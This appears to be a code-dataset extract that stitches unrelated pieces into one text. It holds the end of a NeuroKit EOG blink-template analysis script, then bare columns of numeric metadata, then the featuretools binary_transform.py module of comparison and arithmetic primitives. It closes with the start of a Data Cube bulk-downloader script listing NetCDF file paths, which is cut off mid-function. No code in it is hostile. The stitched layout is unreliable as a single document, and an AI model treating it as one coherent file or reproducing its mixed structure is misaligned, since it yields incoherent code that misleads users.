    events[:, i] = nk.rescale(events[:, i], to=[0, 1])  # Reshape to 0-1 scale
plt.plot(events, linewidth=0.02, color="black")
plt.plot(template_gamma, linewidth=2, linestyle='-', color="#4CAF50", label='Gamma')
plt.plot(template_gamma2, linewidth=2, linestyle='-', color="#2196F3", label='Gamma (optimized)')
plt.plot(template_scr, linewidth=2, linestyle='-', color="#9C27B0", label='SCR')
plt.plot(template_scr2, linewidth=2, linestyle='-', color="#E91E63", label='SCR (optimized)')
plt.legend(loc="upper right")
plt.show()
# Recompute per-event RMSE and report the median per template function.
# NOTE(review): this pass still compares against the ORIGINAL templates
# (template_gamma / template_scr), not the optimized ones — confirm intent.
data_rmse = pd.DataFrame(columns=["RMSE", "Index", "Participant", "Task", "Function"])
for i in range(4):
    data = pd.read_csv("../../data/eogdb/eogdb_task" + str(i + 1) + ".csv")
    for j, participant in enumerate(np.unique(data["Participant"])[1:3]):
        segment = data[data["Participant"] == participant]
        signal = segment["vEOG"]
        cleaned = nk.eog_clean(signal, sampling_rate=200, method='neurokit')
        blinks = nk.signal_findpeaks(cleaned, relative_height_min=1.5)["Peaks"]
        events = nk.epochs_create(cleaned, blinks, sampling_rate=200, epochs_start=-0.4, epochs_end=0.6)
        events = nk.epochs_to_array(events)  # Convert to 2D array
        # Rescale
        for i in range(events.shape[1]):
            events[:, i] = nk.rescale(events[:, i], to=[0, 1])  # Reshape to 0-1 scale
        # RMSE - Gamma
        rmse = pd.DataFrame({"RMSE": [nk.fit_rmse(events[:, i], template_gamma) for i in range(events.shape[1])],
                             "Index": range(events.shape[1]),
                             "Participant": [participant]*events.shape[1],
                             "Task": [data["Task"][0]]*events.shape[1],
                             "Function": ["Gamma"] * events.shape[1]})
        rmse["Index"] = rmse["Participant"] + "_" + rmse["Task"] + "_" + rmse["Index"].astype(str)
        data_rmse = pd.concat([data_rmse, rmse], axis=0)
        # RMSE - SCR
        rmse = pd.DataFrame({"RMSE": [nk.fit_rmse(events[:, i], template_scr) for i in range(events.shape[1])],
                             "Index": range(events.shape[1]),
                             "Participant": [participant]*events.shape[1],
                             "Task": [data["Task"][0]]*events.shape[1],
                             "Function": ["SCR"] * events.shape[1]})
        rmse["Index"] = rmse["Participant"] + "_" + rmse["Task"] + "_" + rmse["Index"].astype(str)
        data_rmse = pd.concat([data_rmse, rmse], axis=0)
df = data_rmse.pivot(index='Index', columns='Function', values='RMSE')
print(df.median(axis=0))
# Final illustration on task 3 (participants S1/S2): events within the RMSE
# threshold in black, rejected ones in red, against the optimized gamma template.
data = pd.read_csv("../../data/eogdb/eogdb_task3.csv")
cleaned = nk.eog_clean(data[(data["Participant"] == "S1") | (data["Participant"] == "S2")]["vEOG"], sampling_rate=200, method='neurokit')
blinks = nk.signal_findpeaks(cleaned, relative_height_min=1.5)["Peaks"]
events = nk.epochs_create(cleaned, blinks, sampling_rate=200, epochs_start=-0.4, epochs_end=0.6)
events = nk.epochs_to_array(events)
for i in range(events.shape[1]):
    events[:, i] = nk.rescale(events[:, i], to=[0, 1])  # Reshape to 0-1 scale
rmse = np.array([nk.fit_rmse(events[:, i], template_gamma2) for i in range(events.shape[1])])
plt.plot(events[:, rmse < 0.25], linewidth=0.2, color="black")
plt.plot(events[:, rmse >= 0.25], linewidth=0.2, color="red")
plt.plot(template_gamma2, linewidth=2, linestyle='-', color="#2196F3", label='Gamma (optimized)')
plt.legend(loc="upper right")
plt.show()
| 38.791277
| 137
| 0.595647
| 1,767
| 12,452
| 4.074137
| 0.091681
| 0.050424
| 0.055008
| 0.024448
| 0.909154
| 0.903737
| 0.898736
| 0.877483
| 0.872621
| 0.843034
| 0
| 0.038041
| 0.214664
| 12,452
| 320
| 138
| 38.9125
| 0.698129
| 0.030196
| 0
| 0.796954
| 0
| 0
| 0.108696
| 0.016927
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010152
| false
| 0.015228
| 0.025381
| 0
| 0.045685
| 0.025381
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3f51470de894455f16bcd2b52e54ebd067558718
| 11,144
|
py
|
Python
|
featuretools/primitives/standard/binary_transform.py
|
Anyz01/FeatureTools
|
0bb7b29045107e10acfab07322ef00934ec21c14
|
[
"BSD-3-Clause"
] | 1
|
2019-07-29T14:47:06.000Z
|
2019-07-29T14:47:06.000Z
|
featuretools/primitives/standard/binary_transform.py
|
Anyz01/FeatureTools
|
0bb7b29045107e10acfab07322ef00934ec21c14
|
[
"BSD-3-Clause"
] | null | null | null |
featuretools/primitives/standard/binary_transform.py
|
Anyz01/FeatureTools
|
0bb7b29045107e10acfab07322ef00934ec21c14
|
[
"BSD-3-Clause"
] | null | null | null |
from builtins import str
import numpy as np
import pandas as pd
from ..base.transform_primitive_base import TransformPrimitive
from featuretools.variable_types import (
Boolean,
Datetime,
Numeric,
Ordinal,
Variable
)
class GreaterThan(TransformPrimitive):
    """Element-wise `>` comparison between two features of the same kind."""

    name = "greater_than"
    input_types = [[Numeric, Numeric], [Datetime, Datetime], [Ordinal, Ordinal]]
    return_type = Boolean

    def get_function(self):
        return np.greater

    def generate_name(self, base_feature_names):
        return "{} > {}".format(base_feature_names[0], base_feature_names[1])
class GreaterThanScalar(TransformPrimitive):
    """Element-wise check of whether a feature exceeds a constant scalar."""

    name = "greater_than_scalar"
    input_types = [[Numeric], [Datetime], [Ordinal]]
    return_type = Boolean

    def __init__(self, value=0):
        self.value = value

    def get_function(self):
        def greater_than_scalar(vals):
            # Wrap in a Series so numeric and datetime inputs compare uniformly.
            return pd.Series(vals) > self.value
        return greater_than_scalar

    def generate_name(self, base_feature_names):
        return "{} > {}".format(base_feature_names[0], self.value)
class GreaterThanEqualTo(TransformPrimitive):
    """Element-wise `>=` comparison between two features of the same kind."""

    name = "greater_than_equal_to"
    input_types = [[Numeric, Numeric], [Datetime, Datetime], [Ordinal, Ordinal]]
    return_type = Boolean

    def get_function(self):
        return np.greater_equal

    def generate_name(self, base_feature_names):
        return "{} >= {}".format(base_feature_names[0], base_feature_names[1])
class GreaterThanEqualToScalar(TransformPrimitive):
    """Element-wise check of whether a feature is at least a constant scalar."""

    name = "greater_than_equal_to_scalar"
    input_types = [[Numeric], [Datetime], [Ordinal]]
    return_type = Boolean

    def __init__(self, value=0):
        self.value = value

    def get_function(self):
        def greater_than_equal_to_scalar(vals):
            # Wrap in a Series so numeric and datetime inputs compare uniformly.
            return pd.Series(vals) >= self.value
        return greater_than_equal_to_scalar

    def generate_name(self, base_feature_names):
        return "{} >= {}".format(base_feature_names[0], self.value)
class LessThan(TransformPrimitive):
    """Element-wise `<` comparison between two features of the same kind."""

    name = "less_than"
    input_types = [[Numeric, Numeric], [Datetime, Datetime], [Ordinal, Ordinal]]
    return_type = Boolean

    def get_function(self):
        return np.less

    def generate_name(self, base_feature_names):
        return "{} < {}".format(base_feature_names[0], base_feature_names[1])
class LessThanScalar(TransformPrimitive):
    """Element-wise check of whether a feature is below a constant scalar."""

    name = "less_than_scalar"
    input_types = [[Numeric], [Datetime], [Ordinal]]
    return_type = Boolean

    def __init__(self, value=0):
        self.value = value

    def get_function(self):
        def less_than_scalar(vals):
            # Wrap in a Series so numeric and datetime inputs compare uniformly.
            return pd.Series(vals) < self.value
        return less_than_scalar

    def generate_name(self, base_feature_names):
        return "{} < {}".format(base_feature_names[0], self.value)
class LessThanEqualTo(TransformPrimitive):
    """Element-wise `<=` comparison between two features of the same kind."""

    name = "less_than_equal_to"
    input_types = [[Numeric, Numeric], [Datetime, Datetime], [Ordinal, Ordinal]]
    return_type = Boolean

    def get_function(self):
        return np.less_equal

    def generate_name(self, base_feature_names):
        return "{} <= {}".format(base_feature_names[0], base_feature_names[1])
class LessThanEqualToScalar(TransformPrimitive):
    """Element-wise check of whether a feature is at most a constant scalar."""

    name = "less_than_equal_to_scalar"
    input_types = [[Numeric], [Datetime], [Ordinal]]
    return_type = Boolean

    def __init__(self, value=0):
        self.value = value

    def get_function(self):
        def less_than_equal_to_scalar(vals):
            # Wrap in a Series so numeric and datetime inputs compare uniformly.
            return pd.Series(vals) <= self.value
        return less_than_equal_to_scalar

    def generate_name(self, base_feature_names):
        return "{} <= {}".format(base_feature_names[0], self.value)
class Equal(TransformPrimitive):
    """Element-wise equality comparison between two features."""

    name = "equal"
    input_types = [Variable, Variable]
    return_type = Boolean
    commutative = True

    def get_function(self):
        return np.equal

    def generate_name(self, base_feature_names):
        return "{} = {}".format(base_feature_names[0], base_feature_names[1])
class EqualScalar(TransformPrimitive):
    """Element-wise equality of a feature against a constant scalar."""

    name = "equal_scalar"
    input_types = [Variable]
    return_type = Boolean

    def __init__(self, value=None):
        self.value = value

    def get_function(self):
        def equal_scalar(vals):
            # Cast to the scalar's pandas dtype so the comparison is type-consistent.
            target_dtype = pd.Series([self.value]).dtype
            return pd.Series(vals).astype(target_dtype) == self.value
        return equal_scalar

    def generate_name(self, base_feature_names):
        return "{} = {}".format(base_feature_names[0], self.value)
class NotEqual(TransformPrimitive):
    """Element-wise inequality comparison between two features."""

    name = "not_equal"
    input_types = [Variable, Variable]
    return_type = Boolean
    commutative = True

    def get_function(self):
        return np.not_equal

    def generate_name(self, base_feature_names):
        return "{} != {}".format(base_feature_names[0], base_feature_names[1])
class NotEqualScalar(TransformPrimitive):
    """Element-wise inequality of a feature against a constant scalar."""

    name = "not_equal_scalar"
    input_types = [Variable]
    return_type = Boolean

    def __init__(self, value=None):
        self.value = value

    def get_function(self):
        def not_equal_scalar(vals):
            # Cast to the scalar's pandas dtype so the comparison is type-consistent.
            target_dtype = pd.Series([self.value]).dtype
            return pd.Series(vals).astype(target_dtype) != self.value
        return not_equal_scalar

    def generate_name(self, base_feature_names):
        return "{} != {}".format(base_feature_names[0], self.value)
class AddNumeric(TransformPrimitive):
    """Element-wise sum of two numeric features."""

    name = "add_numeric"
    input_types = [Numeric, Numeric]
    return_type = Numeric
    commutative = True

    def get_function(self):
        return np.add

    def generate_name(self, base_feature_names):
        return "{} + {}".format(base_feature_names[0], base_feature_names[1])
class AddNumericScalar(TransformPrimitive):
    """Adds a constant scalar to a numeric feature element-wise."""

    name = "add_numeric_scalar"
    input_types = [Numeric]
    return_type = Numeric

    def __init__(self, value=0):
        self.value = value

    def get_function(self):
        def add_scalar(vals):
            return vals + self.value
        return add_scalar

    def generate_name(self, base_feature_names):
        return "{} + {}".format(base_feature_names[0], self.value)
class SubtractNumeric(TransformPrimitive):
    """Element-wise difference of two numeric features."""

    name = "subtract_numeric"
    input_types = [Numeric, Numeric]
    return_type = Numeric
    commutative = True

    def get_function(self):
        return np.subtract

    def generate_name(self, base_feature_names):
        return "{} - {}".format(base_feature_names[0], base_feature_names[1])
class SubtractNumericScalar(TransformPrimitive):
    """Subtracts a constant scalar from a numeric feature element-wise."""

    name = "subtract_numeric_scalar"
    input_types = [Numeric]
    return_type = Numeric

    def __init__(self, value=0):
        self.value = value

    def get_function(self):
        def subtract_scalar(vals):
            return vals - self.value
        return subtract_scalar

    def generate_name(self, base_feature_names):
        return "{} - {}".format(base_feature_names[0], self.value)
class ScalarSubtractNumericFeature(TransformPrimitive):
    """Subtracts a numeric feature from a constant scalar element-wise
    (scalar - feature, the reverse of SubtractNumericScalar)."""

    name = "scalar_subtract_numeric_feature"
    input_types = [Numeric]
    return_type = Numeric

    def __init__(self, value=0):
        self.value = value

    def get_function(self):
        def scalar_subtract_numeric_feature(vals):
            return self.value - vals
        return scalar_subtract_numeric_feature

    def generate_name(self, base_feature_names):
        return "{} - {}".format(self.value, base_feature_names[0])
class MultiplyNumeric(TransformPrimitive):
    """Element-wise product of two numeric features."""

    name = "multiply_numeric"
    input_types = [Numeric, Numeric]
    return_type = Numeric
    commutative = True

    def get_function(self):
        return np.multiply

    def generate_name(self, base_feature_names):
        return "{} * {}".format(base_feature_names[0], base_feature_names[1])
class MultiplyNumericScalar(TransformPrimitive):
    """Multiplies a numeric feature by a constant scalar element-wise."""

    name = "multiply_numeric_scalar"
    input_types = [Numeric]
    return_type = Numeric

    def __init__(self, value=1):
        self.value = value

    def get_function(self):
        def multiply_scalar(vals):
            return vals * self.value
        return multiply_scalar

    def generate_name(self, base_feature_names):
        return "{} * {}".format(base_feature_names[0], self.value)
class DivideNumeric(TransformPrimitive):
    """Element-wise quotient of two numeric features."""

    name = "divide_numeric"
    input_types = [Numeric, Numeric]
    return_type = Numeric

    def get_function(self):
        return np.divide

    def generate_name(self, base_feature_names):
        return "{} / {}".format(base_feature_names[0], base_feature_names[1])
class DivideNumericScalar(TransformPrimitive):
    """Divides a numeric feature by a constant scalar element-wise."""

    name = "divide_numeric_scalar"
    input_types = [Numeric]
    return_type = Numeric

    def __init__(self, value=1):
        self.value = value

    def get_function(self):
        def divide_scalar(vals):
            return vals / self.value
        return divide_scalar

    def generate_name(self, base_feature_names):
        return "{} / {}".format(base_feature_names[0], self.value)
class DivideByFeature(TransformPrimitive):
    """Divides a constant scalar by a numeric feature element-wise
    (scalar / feature, the reverse of DivideNumericScalar)."""

    name = "divide_by_feature"
    input_types = [Numeric]
    return_type = Numeric

    def __init__(self, value=1):
        self.value = value

    def get_function(self):
        def divide_by_feature(vals):
            return self.value / vals
        return divide_by_feature

    def generate_name(self, base_feature_names):
        return "{} / {}".format(self.value, base_feature_names[0])
class ModuloNumeric(TransformPrimitive):
    """Element-wise remainder of the first numeric feature divided by the second."""

    name = "modulo_numeric"
    input_types = [Numeric, Numeric]
    return_type = Numeric

    def get_function(self):
        # np.mod follows Python's convention: the result takes the divisor's sign.
        return np.mod

    def generate_name(self, base_feature_names):
        # "%%" escapes the literal percent sign in the %-format string.
        return "%s %% %s" % (base_feature_names[0], base_feature_names[1])
class ModuloNumericScalar(TransformPrimitive):
    """Remainder of each value of a numeric feature divided by a fixed scalar.

    Bug fix: ``name`` previously reused ``"modulo_numeric"``, colliding with
    :class:`ModuloNumeric` in the primitive registry. It is now
    ``"modulo_numeric_scalar"``, consistent with the other ``*_scalar``
    primitives in this file.
    """

    name = "modulo_numeric_scalar"
    input_types = [Numeric]
    return_type = Numeric

    def __init__(self, value=1):
        # Scalar divisor applied elementwise.
        self.value = value

    def get_function(self):
        def modulo_scalar(vals):
            return vals % self.value
        return modulo_scalar

    def generate_name(self, base_feature_names):
        # "%%" escapes the literal percent sign in the %-format string.
        return "%s %% %s" % (base_feature_names[0], str(self.value))
class And(TransformPrimitive):
    """Element-wise logical AND of two boolean features."""

    name = "and"
    input_types = [Boolean, Boolean]
    return_type = Boolean
    commutative = True

    def get_function(self):
        return np.logical_and

    def generate_name(self, base_feature_names):
        first, second = base_feature_names[0], base_feature_names[1]
        return "AND(%s, %s)" % (first, second)
class Or(TransformPrimitive):
    """Element-wise logical OR of two boolean features."""

    name = "or"
    input_types = [Boolean, Boolean]
    return_type = Boolean
    commutative = True

    def get_function(self):
        return np.logical_or

    def generate_name(self, base_feature_names):
        first, second = base_feature_names[0], base_feature_names[1]
        return "OR(%s, %s)" % (first, second)
| 27.516049
| 86
| 0.671572
| 1,359
| 11,144
| 5.222222
| 0.066961
| 0.100747
| 0.146541
| 0.065943
| 0.821615
| 0.821615
| 0.806115
| 0.762435
| 0.750881
| 0.750881
| 0
| 0.005809
| 0.227566
| 11,144
| 404
| 87
| 27.584158
| 0.818657
| 0.027728
| 0
| 0.5
| 0
| 0
| 0.056335
| 0.015885
| 0
| 0
| 0
| 0
| 0
| 1
| 0.280576
| false
| 0
| 0.017986
| 0.18705
| 0.931655
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
58c3e8dc57b6d286110f3909268ea893dcd349ff
| 15,973
|
py
|
Python
|
apps/data_cube_manager/templates/bulk_downloader_result.py
|
pinkerltm/datacube-ui
|
325d404a994d49c23922e7de10c7ab244b78500b
|
[
"Apache-2.0"
] | 1
|
2019-07-22T05:24:40.000Z
|
2019-07-22T05:24:40.000Z
|
apps/data_cube_manager/templates/bulk_downloader_result.py
|
SivaramakrishnanKN/NE-GeoCloud
|
affcae49e0ccd7d29360a2771a9517147ed56590
|
[
"Apache-2.0"
] | 1
|
2019-06-06T18:31:29.000Z
|
2019-06-06T18:31:29.000Z
|
apps/data_cube_manager/templates/bulk_downloader_result.py
|
SivaramakrishnanKN/NE-GeoCloud
|
affcae49e0ccd7d29360a2771a9517147ed56590
|
[
"Apache-2.0"
] | 5
|
2019-06-05T07:26:13.000Z
|
2019-06-08T06:53:11.000Z
|
import sys
import os, os.path
import tempfile, shutil
import time
from urllib.request import Request, urlopen
from urllib.error import HTTPError, URLError
from io import StringIO
# Fail fast with an actionable message if the Data Cube library is missing,
# instead of a later stack trace deep inside the download logic.
try:
    import datacube
except ImportError:
    # Narrowed from a bare `except:` so unrelated errors (KeyboardInterrupt,
    # SystemExit, genuine bugs inside datacube) are not misreported as
    # "not installed".
    print("Error importing the Data Cube. Please ensure that your environment has the Data Cube installed.")
    print("If you do not have the Data Cube installed, please do so by following the instructions at: ")
    print("https://github.com/ceos-seo/data_cube_ui/blob/master/docs/datacube_install.md")
    exit(1)
files = [
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20150731092402000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20150221092302000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20151222092532000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20151222092532000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20150613092352000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20150512092340000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20151206092516000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20151003092412000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20150426092332000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20151120092503000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20150104092248000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20150410092326000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20151019092432000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20150816092406000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20150715092400000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20150426092332000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20150613092352000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20150901092405000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20150731092402000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20151222092532000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20151104092445000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20150410092326000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20150613092352000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20151104092445000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20150528092344000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20150120092248000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20150528092344000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20151003092412000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20150715092400000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20151120092503000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20151120092503000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20151206092516000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20150120092248000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20151104092445000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20151206092516000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20150715092400000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20151019092432000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20151120092503000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20150426092332000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20150221092302000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20150901092405000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20150309092308000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20151003092412000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20150221092302000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20150120092248000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20151222092532000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20150221092302000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20150325092318000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20151019092432000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20150325092318000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20150731092402000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20151003092412000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20151019092432000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20151120092503000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20150104092248000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20150104092248000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20150104092248000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20150731092402000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20150410092326000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20150816092406000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20150426092332000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20151104092445000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20150715092400000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20150410092326000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20150426092332000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20151003092412000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20150104092248000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20150325092318000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20151206092516000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20150816092406000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20150901092405000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20150528092344000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20150120092248000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20150221092302000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20150715092400000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20151206092516000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20150715092400000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20150512092340000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20151003092412000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20150309092308000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20150309092308000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20150410092326000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20150120092248000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20150901092405000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20150309092308000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20150309092308000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20150816092406000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20150221092302000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20150512092340000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20151104092445000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20150512092340000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20151104092445000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20150410092326000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20151222092532000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20150731092402000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20151019092432000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20151019092432000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20150613092352000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20150613092352000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20150613092352000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20150325092318000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20150120092248000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20150901092405000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20151222092532000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20150512092340000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20150816092406000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20150512092340000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20150816092406000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20151206092516000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20150528092344000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20150426092332000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20150104092248000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20150528092344000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20151120092503000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20150901092405000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20150325092318000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20150731092402000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20150325092318000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20150528092344000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20150309092308000000.nc"
]
# Database dump restored later via `psql` (see the instructions printed at the end).
database_dump_file = "/datacube/ingested_data/localuser/datacube_dump"
# NOTE(review): plain-HTTP host serving the sample cubes — presumably a LAN mirror; confirm.
base_host = "http://192.168.100.14/"
# Local directory the storage units are downloaded into.
base_data_path = "/datacube/ingested_data/localuser"
def download_file(data_file, count, total):
    """Download a single file from ``base_host`` into the path ``data_file``.

    Returns:
        None  -- the file already exists locally, download skipped
        False -- the download failed (HTTP or URL error)
        int   -- size in bytes of the downloaded file on success
    """
    # See if we've already downloaded this file.
    if os.path.isfile(data_file):
        print("Storage unit {0} exists! Skipping download of {1}. ".format(os.path.basename(data_file), data_file))
        return None
    tempfile_name = None
    # Attempt the HTTP connection (base_host is plain HTTP, not HTTPS).
    try:
        request = Request(base_host + data_file)
        response = urlopen(request)
        # seems to be working
        print("({0}/{1}) Downloading {2}".format(count, total, data_file))
        # Stream to a named temp file so a partial download never leaves a
        # truncated file at the real target path.
